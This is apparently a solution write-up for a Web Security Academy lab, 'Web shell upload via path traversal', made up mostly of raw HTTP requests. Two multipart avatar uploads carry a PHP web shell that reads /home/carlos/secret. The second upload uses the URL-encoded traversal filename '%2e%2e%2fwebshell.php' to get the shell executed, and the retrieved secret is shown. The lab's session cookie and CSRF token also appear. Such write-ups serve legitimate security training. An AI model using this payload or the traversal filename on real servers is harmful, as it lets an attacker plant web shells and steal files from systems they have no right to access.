Skip to content

Web shell upload via path traversal

Web shell upload via path traversal

Solution

Login to PA as user wiener

L: wiener
P: peter

Upload webshell.php

POST /my-account/avatar HTTP/2
Host: 0a4100f1049429828437e5ba002e004f.web-security-academy.net
Cookie: session=VpomqSwEmGnjbmnG7XUZfKvEtqV78t23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------878108008154649323933677590
Content-Length: 536
Origin: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net
Referer: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="avatar"; filename="webshell.php"
Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>


-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="user"

wiener
-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="csrf"

5qFHfXAjWEAQX3wFMDgAQ6gmxIFOpnYf
-----------------------------878108008154649323933677590--

Check output

The application does not execute the code
<?php echo file_get_contents('/home/carlos/secret'); ?>
---
view-source:https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/files/avatars/webshell.php

Upload second payload

POST /my-account/avatar HTTP/2
Host: 0a4100f1049429828437e5ba002e004f.web-security-academy.net
Cookie: session=VpomqSwEmGnjbmnG7XUZfKvEtqV78t23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------878108008154649323933677590
Content-Length: 545
Origin: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net
Referer: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="avatar"; filename="%2e%2e%2fwebshell.php"
Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>


-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="user"

wiener
-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="csrf"

5qFHfXAjWEAQX3wFMDgAQ6gmxIFOpnYf
-----------------------------878108008154649323933677590--

Read output

view-source:https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/files/../webshell.php
---
YCc5TJScH832tyLi7AGhswaYHgT8ENr9

Submit solution